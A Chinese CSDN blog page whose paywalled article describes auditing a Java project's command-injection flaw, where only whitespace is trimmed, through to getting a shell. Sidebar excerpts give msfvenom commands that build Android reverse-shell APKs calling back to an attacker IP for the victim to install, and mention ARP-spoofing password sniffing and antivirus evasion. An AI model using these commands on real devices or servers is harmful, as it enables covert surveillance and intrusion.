JAVA代码审计 ——从命令执行到GetShell

最新推荐文章于 2024-06-08 17:05:04 发布
最新推荐文章于 2024-06-08 17:05:04 发布
阅读量386 收藏
点赞数
文章标签: 系统安全 web安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MSB_WLAQ/article/details/120556480
版权
本文分享了一个JAVA项目中的命令执行漏洞案例,详细解析了从参数可控到利用该漏洞成功GetShell的过程。通过代码审计,发现只进行了简单的空格过滤,存在安全隐患。经过测试,发现可以通过特定编码绕过过滤,最终实现远程命令执行并获取服务器权限。
摘要由CSDN通过智能技术生成

严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。

 

 

从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。

接着来找一下这个方法的调用链,

 

可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。

然后找一下这个jdk参数是否是我们可控的,

 

上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。

 

最低0.47元/天 解锁文章
白面安全猿
关注
Java代码审计——文件操作漏洞
m0_61506558的博客
11-22 728
Web 本身的这一个功能,从而实现形如任意文件上传、任意文件下载/读取、任意文件删除等漏洞,有的场景下甚至可以利用文件解压实现目录穿越或拒绝服务攻击等,对服务器造成巨大的危害。文件上传的检测是重中之重,任意文件上传漏洞给攻击者带来的危害是巨大的,因此对于安全审计者来说,上传漏洞是审计工作中的重点内容。文件写入与文件上传比较相似,不同的是,文件写入并非真正要上传一个文件,而是将原本要上传的文件中的代码通过。的核心功能之一,其中常用的操作就是将服务器上的文件以流的形式在本地读写,或上传到网络上,Java
Java代码审计之远程命令执行漏洞(REC)详解
悦分享
01-23 470
Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。很多人喜欢把代码执行漏洞称为命令执行漏洞,因为命令执行漏洞可以执行系统命令,而代码执行漏洞也会执行系统命令,这样就容易混淆。
Kali利用MSF渗透安卓手机_kali入侵安卓手机,从外包公司到今日头条offer
2401_84166672的博客
04-09 889
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Kali Linux-MSF远控局域网手机
道阻且长,行则将至。
01-14 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 机器 IP地址 Win10 物理主机 192.168.0.105 Kali 虚拟机 192.16...
kali实现监控手机
weixin_55685021的博客
03-16 2128
不过小编最近也在考虑自己创业,一些相关的小技术分享也会减少,毕竟现在的开发行业,相比之前来说也是非常头疼的,大家都在卷,也导致刚刚出来的小伙伴面临就业的打压,各种框架的不断更新,不断的拓展,什么网络安全的,前端,后端等等层出不穷,本来写代码这个东西就需要不断的敲,不断的写demo,不断地练习,不断的实践,但是当你上班以后,你会发现真的是上班打螺丝,面试造火箭,对于普通的程序员来说确实就业压力很大,了解一个行业,在一个行业里面学到东西很重要。前提:需要用到Kali,相关演示在kali上,务必安装kali。
kali 控制安卓手机
lws24919的博客
01-06 8099
ip add //查看kali 的ip地址 虚拟机桥接模式 msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip地址 LPORT=4444 R > t.apk 生成apk下载到手机 可以利用kali Apache2 在局域网内直接下载apk或其他办法 sudo cp t.apk /var/www/html //拷贝到此目录可网页访问 vi /var/www/html/index.html //...
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1100
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
帆软V9getshell1
08-03
### 帆软V9getshell1:任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司(FineSoft)是中国领先的企业级报表工具及商业智能解决方案提供商,其核心产品之一为FineReport报表设计工具。在...
代码审计-Java项目审计-SQL注入漏洞
xiaoheizi的博客
08-16 317
eval assert preg_replace call_user_func call_user_func_array等。extract() parse_str() import_request_variables() $$ 等。$_FILES,type="file",上传,move_uploaded_file()等。$_GET,$_POST,$_REQUEST,$_FILES,$_SERVER等。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。
2018手机远程控制+教程
10-17
2018手机远程控制+教程 适合对象:小白 压缩包里附教程 注:工具不得违法使用,只做测试使用,如触犯违法,后果自负,于本人无关。
kali控制安卓(拍照、通讯录、GPS等)
weixin_45511599的博客
10-06 1万+
1.生成apk(目标手机安装) msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=8888 R > tst.apk 注意:ip地址是kali的,不是目标手机的 2.开启kali自带的web服务器 sudo service apache2 start 3.将apk拷贝到服务器根目录 sudo cp tst.apk /var/www/html 4.目标手机下载安装txt.apk 方法一:目标手机直接在网址
简单的渗透(远程反向控制)——kali linux操控Android系统
m0_56451748的博客
11-23 3312
简单的远程反向控制
手机与手机、电脑之间的远程控制方法
热门推荐
LeeKwen的专栏
05-14 4万+
远程控制很有用的,对于调试人员来说,意义重大,这里只写方法,简单实用。控制的设备包括:手机控制手机(含界面),系统包括android和IOS。手机控制电脑(含界面),系统包括Windows和Linux。具体的方法如下:1、被控制端(手机)被控制端,这里以Android为例了,如果被控制设备是root过的,更佳。如果没有root的被控制端设备,那么就比较苦逼一点了,需要将自己的屏幕常亮,进程才不会退...
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3709
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
kali linux远程控制
WeiMengPing_的博客
06-12 1662
为了防止黑客偷偷在计算机上安装远程控制被控端,我们通常会在计算机上安装杀毒软件,如我们都很熟悉的 360 卫等。试图将远程控制被控端植目标系统时,常常会被这些杀毒软件发现并阻止。长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也一直致力于研究避开检测的方法(简称为免杀技)术)。双方“各显神通”,一直在“魔高一尺,道高一丈,魔再高一丈”地发展着。
kali 使用后台进行手机拍照,查看定位,获取信息,(通讯录等操作)
god953的博客
02-09 2万+
控制安卓手机拍照,查看定位,获取通信录引言准备工作1. kali、手机2.戴上眼睛注意别敲错命令,复制的时候注意看!开始了!!!FirstSecond 引言 ** 大家好,我是Zues,今天我来教会大家一个入侵安卓手机控制手机拍照,查看定位,获取通信录,查看手机内容。 首先准备工具 ** 准备工作 1. kali、手机 只需要大家准备kali操作系统以及一部手机就好。若是大家做过程中遇到问题,欢迎留言交流 2.戴上眼睛注意别敲错命令,复制的时候注意看! 开始了!!! First 1. 打开kali 进
23版kali msf连接失败问题
最新发布
frost_h的博客
06-08 215
设置服务器内部操作的时区 timezone = 'Asia/Shanghai'# 设置日志时区 log_timezone = 'Asia/Shanghai'进入数据库,让它进行版本匹配。
Kali渗透-ARP断网攻击与监听
道阻且长,行则将至。
02-29 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。 环境说明 主机 IP地址 Kali Linu...
Seacms代码审计:getshell漏洞深度解析
eval($`后跟恶意代码,来执行任意PHP代码,即实现了getshell攻击。 其次,审计还揭示了`require_once`函数在`data/admin/ip.php`中的滥用。通常情况下,这些函数会包含一些预定义或安全的文件,但在该场景下,由于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值